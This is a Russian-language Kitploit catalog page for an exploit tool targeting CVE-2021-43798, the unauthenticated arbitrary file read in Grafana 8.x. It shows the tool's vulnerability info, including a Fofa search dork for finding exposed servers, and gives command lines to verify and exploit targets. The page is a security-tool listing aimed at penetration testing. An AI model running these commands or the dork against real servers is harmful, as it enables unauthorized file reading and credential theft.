Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43798 — Уязвимость произвольного чтения файлов в Grafana | Kitploit
Инструменты/GitHubGitHub/zer0yu/cve-2021-43798
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubzer0yu/cve-2021-43798

CVE-2021-43798

Уязвимость произвольного чтения файлов в Grafana

Репозиторий
2764 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GrafanaArbitraryFileRead

Использование

1. Показать информацию

root@kitploit:~
❯ go run main.go -s                                               
[INF] VulnInfo:
{
  "Name": "Grafana Arbitrary File Read",
  "VulID": "nil",
  "Version": "1.0",
  "Author": "z3",
  "VulDate": "2021-12-07",
  "References": [
    "https://nosec.org/home/detail/4914.html"
  ],
  "AppName": "Grafana",
  "AppPowerLink": "https://grafana.com/",
  "AppVersion": "Grafana Version 8.*",
  "VulType": "Arbitrary File Read",
  "Description": "An unauthorized arbitrary file reading vulnerability exists in Grafana, which can be exploited by an attacker to read arbitrary files on the host computer without authentication.",
  "Category": "REMOTE",
  "Dork": {
    "Fofa": "app=\"Grafana\"",
    "Quake": "",
    "Zoomeye": "",
    "Shodan": ""
  }
}%     

2. Проверка

root@kitploit:~
echo vulfocus.fofa.so:55628 | go run main.go -v -t 20 http://vulfocus.fofa.so:55628

3. Эксплуатация

root@kitploit:~
echo http://vulfocus.fofa.so:51766 | go run main.go -m exploit -v

Реализация идеи использования из ссылки 1. Для извлечения дополнительной информации измените регулярное выражение в функции getAccesskey.

Ссылки

  1. Анализ последней уязвимости произвольного чтения файлов Grafana и объяснение производных проблем
  2. Уязвимость произвольного чтения файлов Grafana без авторизации

Отказ от ответственности

Данная процедура предназначена только для самостоятельной проверки безопасности, пожалуйста, сознательно соблюдайте местные законы.

Скачать инструмент